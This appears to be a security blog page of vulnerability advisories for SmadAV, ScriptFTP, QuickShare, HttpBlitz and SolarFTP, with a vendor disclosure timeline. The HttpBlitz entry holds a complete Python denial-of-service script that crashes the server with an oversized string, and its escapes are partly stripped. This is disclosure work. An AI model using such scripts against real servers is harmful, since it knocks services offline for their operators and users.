SmadAV 9.1 Null Pointer Dereference Vulnerability
SmadAV antivirus 9.1 is susceptible to null pointer exploitation. The application does not properly filter the scanner input that processed into smadengine.dll. The successful exploitation of this vulnerability could potentially result a crash on the application, since it will refer to a null pointer, EAX = 0000000.
ScriptFTP <=3.3 Remote Buffer Overflow Exploit (0day)
ScriptFTP client is vulnerable against remote buffer overflow vulnerability. The condition is triggered while processing LIST FTP command with excessive length.
The vulnerability is confirmed in version 3.3. Other version may also be affected.
ScriptFTP is a FTP client designed to automate file transfers. It follows the commands written on a text file (also called script file) and makes the uploads or downloads automatically. Writing the script file is very easy, take a look at the script samples section.
ScriptFTP follows the commands written on a text file (also called script file). Specifically, processing ScriptFTP with text file/script file contains command GETLIST or GETFILE of 3000 or more bytes of data may trigger an exception within the client, causing it to crash and lead us to stack overflow.
Proof of Concept
Fix and Update
Vendor contacted and responded immediately after our first contact. They are planning to major rewrite but until now, no further info received from them. Do not connect to untrusted FTP server. Fix or update is not available yet, we will update this post if the vendor fix the bug.
Vendor Contact Log:
01/21/2011: Bug found
01/22/2011: Vendor contacted
01/24/2011: Vendor replied
03/07/2011: Update status to vendor
04/06/2011: Vendor received POC
05/17/2011: No further info, 1st reminder sent.
09/11/2011: No further info, 2nd reminder sent.
09/20/2011: No response, advisory released.
QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability
QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system.
QuickShare File Server is a easy to use file sharing software helps you build your own file server. Users could access your server through web browsers or FTP client softwares (In most case, they need not to install any extra softwares). Users could send or receive large files to or from you. You could create account and set password to protect your files. (more…)
HttpBlitz Web Server Denial Of Service Exploit
#!/usr/bin/python # Title: HttpBlitz DOS # Date: 12/24/2010 # Author: otoy # Software Link: http://sourceforge.net/projects/httpblitz/files/HttpBlitz.msi/download # Tested on: Windows XP SP3 # # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ / ___/ __ / / __ / __ / __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # __,_/_/__, /_/__/__,_/_/ ___/___/_/ /_/_/__,_/_/ /_/__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # modpr0be, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx to offsec, exploit-db, corelan team # #### Software description: # A cross platform Http web server developed using C++. Agile methodology # with emphasis on :- 1. Good Design 2. Object Oriented Programming 3. # Refactoring 4. Static/Dynamic Analysis, Unit-testing, Code Coverage 5. # Software Engineering best practices. # #### DOS information: # you just have to send long string, and it will crash the program. # just scan the port using nmap will crash the program too. import socket, sys s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) junk = "x41" * 80000 def banner(): print "nHttpBlitz DOS." print "By: otoy (otoy[at]digital-echidna[dot]org)n" if len(sys.argv)!=3: banner() print "Usage: %s <ip> <port>n" %sys.argv sys.exit(0) try: s.connect((sys.argv, int(sys.argv))) except: print "Can't connect to server!n" sys.exit(0) s.send(junk+'rn') s.close()
SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
SolarFTP Server 2.0 is prone to a denial of service condition. It fails to properly sanitize user-supplied input resulting in a denial of service. With a specially crafted ‘USER’, ‘APPE’, ‘GET’, ‘PUT’, and ‘NLST’ command, a remote attacker can potentially disable the FTP service.
Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.
Testing and Fuzzing
Using Very Simple FTP Fuzzer, we test the FTP server with various commands. The first command that we sent was APPE (append). The Windows exception handler pop out. That was verify that the server may be vulnerable to some commands.
Unfortunately, the junk that we sent did not overwrite the SEH nor the EIP. It just end in Denial of Service. In conclusion, there are 4 commands which make the server crash, APPE, NLST, PUT, and GET.